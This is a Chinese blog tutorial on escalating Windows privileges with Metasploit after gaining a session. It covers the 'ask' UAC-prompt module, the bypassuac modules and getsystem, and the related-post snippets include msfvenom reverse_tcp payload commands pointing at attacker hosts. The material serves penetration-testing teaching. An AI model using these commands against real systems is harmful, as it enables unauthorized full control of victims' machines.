后渗透之权限提升(2)

最新推荐文章于 2022-12-13 16:06:54 发布
最新推荐文章于 2022-12-13 16:06:54 发布
阅读量216 收藏
点赞数
分类专栏: 渗透测试 文章标签: 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52178795/article/details/125769719
版权
本文详细介绍了使用Metasploit框架进行程序提权和UAC绕过的方法。首先,通过exploit/windows/local/ask模块进行交互式提权,然后利用bypassuac模块直接绕过UAC获取更高权限。最后,讨论了如何查找并利用系统漏洞进行提权。整个过程展示了渗透测试中权限提升的关键步骤。
摘要由CSDN通过智能技术生成

方法1 提高程序运行级别提权

使用的msf模块(此模块需要用户进行交互)

Exploit/windows/local/ask

连接收到目标主机之后,获取sessions

 进入到这个sessions中

sessions -i 2

 直接提升权限getsystem,发现权限2不够,于是将sessions放到后台

 使用其他模块exploit/windows/local/ask(主要是uac提权用)

use exploit/windows/local/ask

在这个模块设置session,并且设置一个文件名,这个文件一会会在靶机上弹窗,只有靶机上用户运行才能生效

 之后进行执行 exploit,此时靶机会进行弹窗,我们直接确定执行

 

 这样就连接成功了,且生成一个新的session

 进入新生成的sessions中并查看权限

此时还是管理员权限,这时使用getsystem提权就可

 此时就提权成功。

方法2 UAC绕过

msf模块

Exploit/windows/local/bypassuac

 Exploit/windows/local/bypassuac_injection

Exploit/windows/local/bypassuac_vbs

使用此模块(此模块可以直接绕过uac,反弹回来更高权限)

use exploit/windows/local/bypassuac

 先使用一个低权限的session,之后提权用

set session 1

 之后直接运行即可exploit  然后获得一个新的session,进入这个session,直接getsystem即可完提权。

 方法3  利用漏洞提权

 收集靶机系统,查看是否有版本级别的漏洞,使用msf响应模块直接提权

凉城木槿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透提权
ppbgi的博客
05-18 320
信息收集命令 systeminfo 打印系统信息 whoami/priv 当前帐户权限 ipconfig/dispalydns 显示dns信息 route print 打印路由表 arp -a 打印arp表 net user 列出表名 net user username 关于用户的信息 net use \SMBPATH Pa$$wOrd/u:username 连接SMB net localgroup 列出所有组 net view\127.0.0.1 会话打开到当前计算
渗透攻击:权限提升
岁月净好
11-22 574
渗透的最终目的是获取服务器的最高权限,即Windows操作系统中管理员账号的权限,或Linux操作系统中root账户的权限提升权限的方式分为以下两类。 纵向提权:低权限角色获得高权限角色的权限,例如,一个WebShell权限通过提权之后拥有了管理员的权限,那么这种提权就是纵向提权,也称做权限升级 横向提权:获取同级别角色的权限。例如:通过已经攻破的系统A获取了系统 B的权限,那么这种提权就属于横向提权。 所以在成功获取目标机Meterpreter Shell后,我们要知道现在已经拥有了什么权限。   
渗透通过meterpreter模块提权
bring_coco的博客
11-06 939
继上一篇得到的普通session进行提权 提权方法: 一.提高程序的运行级别(uac) 说明:没有绕过uac,而且会弹出uac的框,如果用户点击执行才能成功获得更高权限的shell Msf模块: Exploit/windows/local/ask 1.试试看可不可以直接得到system权限 发现有报错 2.然后先把meterpreter这个session放到后台 3.加载此模块 Info可查看模块描述 用更高等级的水平去执行bypass低等级的uac设置 4.设置当前需要提权的session 此
渗透测试提权指南
遇事不决冲冲冲
12-04 7443
windows系统提权 参考内网安全攻防:渗透测试实战指南(百度百科) 一.系统内核漏洞 利用已存在未安装补丁的漏洞进行提权 参考Windows系统内核溢出漏洞提权 1.手动寻找缺失补丁 拿到权限后通过如下命令查看系统安装了哪些补丁 systeminfo wmic qfe get caption,description,hotfixid,installedon 比CMD更强大的命令行:WMIC后渗透利用(系统命令) 通过没有列出的补丁号,寻找相应的提权EXP进行提权(挺离谱的感觉) 系统漏洞与对应的
meterpreter之getsystem命令提权详解
redwand的博客
07-23 7806
meterpreter shell是msf上集成的一组功能强大的shell集合,当我们获取一个反弹的meterpreter shell时,可以轻松的通过各种命令对靶机进行控制。熟悉的meterpreter的同学都清楚,其中有一个getsystem命令,帮助文档说明是提权用的,没有更详细的说明,很多人会误解为这是meterpreter的一键提权工具,但每次输入这个命令,都会爆出各种“incorrect“和”denied“,本文将通过理论和实验说明此命令的适用环境及提权过程。
内网渗透之windows权限维持
07-18
【标题】"内网渗透之windows权限维持"揭示了网络安全领域的一个重要话题——在Windows操作系统环境中如何保持已获得的权限,以便进行深度的系统分析或恶意活动。这通常涉及到对系统内部工作原理的理解,以及利用特定...
Windows 权限提升 - 概述.pdf
最新发布
10-06
在网络安全渗透测试中,Windows权限提升是一种关键的技术,它涉及通过发现并利用系统中的漏洞来获取更高的系统访问权限。这通常发生在攻击者已经获得一定级别的访问权后,但需要进一步深入系统以获取敏感信息或执行...
Firefox 52.0.2 渗透便携版
05-23
它包括多个步骤,如信息收集、漏洞扫描、利用漏洞、权限提升和清理报告。在这个过程中,渗透测试工具和插件起着至关重要的作用。 在Firefox 52.0.2 渗透便携版中,我们可以期待以下常见的渗透测试插件: 1. **Burp...
渗透软件cs4中文版.zip
12-03
5. **权限提升**:一旦获得基本访问权限,攻击者会尝试提升权限至管理员级别,以获得更广泛的控制权。 6. **横向移动**:在内部网络中,攻击者会寻找并利用其他系统间的连接,以扩展其影响力。 7. **监控与日志...
渗透测试指南之七个阶段
11-11
成功渗透后,测试人员会试图扩大控制范围,探索内部网络、窃取敏感信息、尝试权限升级等,以评估系统纵深防御的有效性。 7. **报告阶段**: 最后,测试人员需编写详细的渗透测试报告,详述测试过程、发现的问题、受...
内网渗透-----权限分析及防御
qq_43590351的博客
10-20 3054
内网权限提升及防御
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 8554
Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
MSF学习笔记(10)
Shadow 爬爬记
12-11 694
宏代码生成root@kali root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe 利用session 扩大战果 生成后门s
msf下Windows提权
wjq18827615690的博客
03-18 260
利用msf生成payload获取目标机session 利用msf生成payload(可以获得一个低权限的session) 生成linux木马 msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.42.49 LPORT=5555 -i 3 -f elf -o test msfvenom -a x86 --platform linux -p linux/x64/meterpreter/..
metasploit下Windows下多种提权方式
weixin_30537451的博客
03-22 367
前言 当你在爱害者的机器上执行一些操作时,发现有一些操作被拒绝执行,为了获得受害机器的完全权限,你需要绕过限制,获取本来没有的一些权限,这些权限可以用来删除文件,查看私有信息,或者安装特殊程序,比如病毒。Metasploit有很多种后渗透方法,可以用于对目标机器的权限绕过,最终获取到系统权限。 环境要求: 1.攻击机:kali linux 2.目标机:Win 7 在已经获取到一个me...
12.1、后渗透测试--提权
无痕的博客
12-13 735
meterpreter后渗透阶段提权
Kali Liunx后渗透测试----对目标进行七种模块方式提权
王先生的蒋小姐的博客
06-09 2140
大家好,我是SuieKa。
windows之UAC提权
p_utao的博客
11-15 1888
前期准备 目标机 攻击机 win7 kali 192.168.43.254 192.168.43.113 我这里,只演示攻击过程,如果有不懂的命令可以去看看我其他的文章有专门我做命令的笔记或者自行去百度。 UAC简介 UAC(User Account Control,用户帐户控制)是微软为提高系统安全而在Windows Vista中引入的新技术,它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,提供权限或管理员‌密码。 也就是说一旦用户允许启动的应用程
metasploit提升权限
热门推荐
星落的博客
05-24 1万+
实例演示-提权 1.获得system账号权限,直接获取会失败,以为win7以上版本电脑含有UAC,因此要绕过UAC。 getsystem 2.使用ask模块进行弹窗,受害人对电脑不了解,点击“是”,从而绕过UAC。 use exploit/windows/local/ask set session 1 run 受害者电脑会进行弹窗,点击允许,就可以提权了。 3.使用bypassuac模块,利用受信任的通过进程注入的发布者证书,他将产生一个关闭UAC标志的shell。 use ..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凉城木槿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值